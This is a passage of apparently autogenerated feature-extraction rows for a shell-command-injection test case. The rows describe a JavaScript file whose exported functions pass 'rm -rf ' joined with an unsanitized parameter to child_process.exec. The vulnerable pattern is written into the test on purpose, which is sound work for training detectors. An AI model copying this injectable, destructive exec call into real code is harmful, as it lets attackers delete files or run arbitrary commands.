autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:3:18:5:1 | 'arguments' object of anonymous function | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:3:18:5:1 | 'arguments' object of anonymous function | enclosingFunctionName | exports | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:3:18:5:1 | 'arguments' object of anonymous function | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:3:18:5:1 | exceptional return of anonymous function | contextFunctionInterfaces | exports(name)\nfoo(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:3:18:5:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:3:18:5:1 | exceptional return of anonymous function | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:3:18:5:1 | exceptional return of anonymous function | enclosingFunctionName | exports | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:3:18:5:1 | exceptional return of anonymous function | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:3:18:5:1 | functio ... dule.\\n} | assignedToPropName | exports | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:3:18:5:1 | functio ... dule.\\n} | contextFunctionInterfaces | exports(name)\nfoo(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:3:18:5:1 | functio ... dule.\\n} | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:3:18:5:1 | functio ... dule.\\n} | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:3:18:5:1 | return of anonymous function | contextFunctionInterfaces | exports(name)\nfoo(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:3:18:5:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:3:18:5:1 | return of anonymous function | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:3:18:5:1 | return of anonymous function | enclosingFunctionName | exports | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:3:18:5:1 | return of anonymous function | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:3:28:3:31 | name | contextFunctionInterfaces | exports(name)\nfoo(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:3:28:3:31 | name | contextFunctionInterfaces | exports(name)\nfoo(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:3:28:3:31 | name | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:3:28:3:31 | name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:3:28:3:31 | name | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:3:28:3:31 | name | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:3:28:3:31 | name | enclosingFunctionName | exports | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:3:28:3:31 | name | enclosingFunctionName | exports | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:3:28:3:31 | name | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:3:28:3:31 | name | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:4:2:4:3 | cp | contextFunctionInterfaces | exports(name)\nfoo(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:4:2:4:3 | cp | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:4:2:4:3 | cp | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:4:2:4:3 | cp | enclosingFunctionName | exports | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:4:2:4:3 | cp | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:4:2:4:8 | cp.exec | contextFunctionInterfaces | exports(name)\nfoo(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:4:2:4:8 | cp.exec | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:4:2:4:8 | cp.exec | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:4:2:4:8 | cp.exec | enclosingFunctionName | exports | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:4:2:4:8 | cp.exec | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:4:2:4:26 | cp.exec ... + name) | contextFunctionInterfaces | exports(name)\nfoo(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:4:2:4:26 | cp.exec ... + name) | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:4:2:4:26 | cp.exec ... + name) | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:4:2:4:26 | cp.exec ... + name) | enclosingFunctionName | exports | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:4:2:4:26 | cp.exec ... + name) | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:4:2:4:26 | exceptional return of cp.exec ... + name) | contextFunctionInterfaces | exports(name)\nfoo(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:4:2:4:26 | exceptional return of cp.exec ... + name) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:4:2:4:26 | exceptional return of cp.exec ... + name) | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:4:2:4:26 | exceptional return of cp.exec ... + name) | enclosingFunctionName | exports | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:4:2:4:26 | exceptional return of cp.exec ... + name) | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:4:5:4:8 | exec | contextFunctionInterfaces | exports(name)\nfoo(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:4:5:4:8 | exec | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:4:5:4:8 | exec | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:4:5:4:8 | exec | enclosingFunctionName | exports | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:4:5:4:8 | exec | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:4:10:4:18 | "rm -rf " | contextFunctionInterfaces | exports(name)\nfoo(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:4:10:4:18 | "rm -rf " | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:4:10:4:18 | "rm -rf " | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:4:10:4:18 | "rm -rf " | enclosingFunctionName | exports | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:4:10:4:18 | "rm -rf " | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:4:10:4:18 | "rm -rf " | stringConcatenatedWith | -endpoint- name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:4:10:4:25 | "rm -rf " + name | CalleeFlexibleAccessPath | cp.exec | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:4:10:4:25 | "rm -rf " + name | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:4:10:4:25 | "rm -rf " + name | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:4:10:4:25 | "rm -rf " + name | contextFunctionInterfaces | exports(name)\nfoo(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:4:10:4:25 | "rm -rf " + name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:4:10:4:25 | "rm -rf " + name | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:4:10:4:25 | "rm -rf " + name | enclosingFunctionName | exports | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:4:10:4:25 | "rm -rf " + name | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:4:10:4:25 | "rm -rf " + name | receiverName | cp | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:4:22:4:25 | name | contextFunctionInterfaces | exports(name)\nfoo(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:4:22:4:25 | name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:4:22:4:25 | name | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:4:22:4:25 | name | enclosingFunctionName | exports | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:4:22:4:25 | name | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:4:22:4:25 | name | stringConcatenatedWith | 'rm -rf ' -endpoint- | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:7:1:7:6 | module | contextFunctionInterfaces | exports(name)\nfoo(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:7:1:7:6 | module | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:7:1:7:6 | module | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:7:1:7:14 | module.exports | contextFunctionInterfaces | exports(name)\nfoo(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:7:1:7:14 | module.exports | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:7:1:7:14 | module.exports | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:7:1:7:18 | module.exports.foo | contextFunctionInterfaces | exports(name)\nfoo(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:7:1:7:18 | module.exports.foo | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:7:1:7:18 | module.exports.foo | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:7:1:9:1 | module. ... dule.\\n} | contextFunctionInterfaces | exports(name)\nfoo(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:7:1:9:1 | module. ... dule.\\n} | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:7:1:9:1 | module. ... dule.\\n} | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:7:8:7:14 | exports | contextFunctionInterfaces | exports(name)\nfoo(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:7:8:7:14 | exports | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:7:8:7:14 | exports | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:7:16:7:18 | foo | contextFunctionInterfaces | exports(name)\nfoo(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:7:16:7:18 | foo | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:7:16:7:18 | foo | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:7:22:7:21 | cp | contextFunctionInterfaces | exports(name)\nfoo(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:7:22:7:21 | cp | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:7:22:7:21 | cp | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:7:22:7:21 | cp | enclosingFunctionName | foo | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:7:22:7:21 | cp | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:7:22:7:21 | this | contextFunctionInterfaces | exports(name)\nfoo(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:7:22:7:21 | this | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:7:22:7:21 | this | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:7:22:7:21 | this | enclosingFunctionName | foo | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:7:22:7:21 | this | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:7:22:9:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | exports(name)\nfoo(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:7:22:9:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:7:22:9:1 | 'arguments' object of anonymous function | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:7:22:9:1 | 'arguments' object of anonymous function | enclosingFunctionName | foo | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:7:22:9:1 | 'arguments' object of anonymous function | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:7:22:9:1 | exceptional return of anonymous function | contextFunctionInterfaces | exports(name)\nfoo(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:7:22:9:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:7:22:9:1 | exceptional return of anonymous function | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:7:22:9:1 | exceptional return of anonymous function | enclosingFunctionName | foo | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:7:22:9:1 | exceptional return of anonymous function | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:7:22:9:1 | functio ... dule.\\n} | assignedToPropName | foo | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:7:22:9:1 | functio ... dule.\\n} | contextFunctionInterfaces | exports(name)\nfoo(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:7:22:9:1 | functio ... dule.\\n} | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:7:22:9:1 | functio ... dule.\\n} | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:7:22:9:1 | return of anonymous function | contextFunctionInterfaces | exports(name)\nfoo(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:7:22:9:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:7:22:9:1 | return of anonymous function | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:7:22:9:1 | return of anonymous function | enclosingFunctionName | foo | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:7:22:9:1 | return of anonymous function | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:7:32:7:35 | name | contextFunctionInterfaces | exports(name)\nfoo(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:7:32:7:35 | name | contextFunctionInterfaces | exports(name)\nfoo(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:7:32:7:35 | name | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:7:32:7:35 | name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:7:32:7:35 | name | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:7:32:7:35 | name | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:7:32:7:35 | name | enclosingFunctionName | foo | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:7:32:7:35 | name | enclosingFunctionName | foo | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:7:32:7:35 | name | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:7:32:7:35 | name | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:8:2:8:3 | cp | contextFunctionInterfaces | exports(name)\nfoo(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:8:2:8:3 | cp | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:8:2:8:3 | cp | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:8:2:8:3 | cp | enclosingFunctionName | foo | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:8:2:8:3 | cp | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:8:2:8:8 | cp.exec | contextFunctionInterfaces | exports(name)\nfoo(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:8:2:8:8 | cp.exec | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:8:2:8:8 | cp.exec | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:8:2:8:8 | cp.exec | enclosingFunctionName | foo | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:8:2:8:8 | cp.exec | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:8:2:8:26 | cp.exec ... + name) | contextFunctionInterfaces | exports(name)\nfoo(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:8:2:8:26 | cp.exec ... + name) | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:8:2:8:26 | cp.exec ... + name) | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:8:2:8:26 | cp.exec ... + name) | enclosingFunctionName | foo | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:8:2:8:26 | cp.exec ... + name) | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:8:2:8:26 | exceptional return of cp.exec ... + name) | contextFunctionInterfaces | exports(name)\nfoo(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:8:2:8:26 | exceptional return of cp.exec ... + name) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:8:2:8:26 | exceptional return of cp.exec ... + name) | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:8:2:8:26 | exceptional return of cp.exec ... + name) | enclosingFunctionName | foo | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:8:2:8:26 | exceptional return of cp.exec ... + name) | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:8:5:8:8 | exec | contextFunctionInterfaces | exports(name)\nfoo(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:8:5:8:8 | exec | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:8:5:8:8 | exec | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:8:5:8:8 | exec | enclosingFunctionName | foo | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:8:5:8:8 | exec | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:8:10:8:18 | "rm -rf " | contextFunctionInterfaces | exports(name)\nfoo(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:8:10:8:18 | "rm -rf " | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:8:10:8:18 | "rm -rf " | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:8:10:8:18 | "rm -rf " | enclosingFunctionName | foo | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:8:10:8:18 | "rm -rf " | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:8:10:8:18 | "rm -rf " | stringConcatenatedWith | -endpoint- name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:8:10:8:25 | "rm -rf " + name | CalleeFlexibleAccessPath | cp.exec | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:8:10:8:25 | "rm -rf " + name | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:8:10:8:25 | "rm -rf " + name | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:8:10:8:25 | "rm -rf " + name | contextFunctionInterfaces | exports(name)\nfoo(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:8:10:8:25 | "rm -rf " + name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:8:10:8:25 | "rm -rf " + name | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:8:10:8:25 | "rm -rf " + name | enclosingFunctionName | foo | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:8:10:8:25 | "rm -rf " + name | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:8:10:8:25 | "rm -rf " + name | receiverName | cp | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:8:22:8:25 | name | contextFunctionInterfaces | exports(name)\nfoo(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:8:22:8:25 | name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:8:22:8:25 | name | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:8:22:8:25 | name | enclosingFunctionName | foo | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:8:22:8:25 | name | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:8:22:8:25 | name | stringConcatenatedWith | 'rm -rf ' -endpoint- | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:1:1:1:0 | module | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:1:1:1:0 | require | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:1:1:1:0 | this | contextFunctionInterfaces | 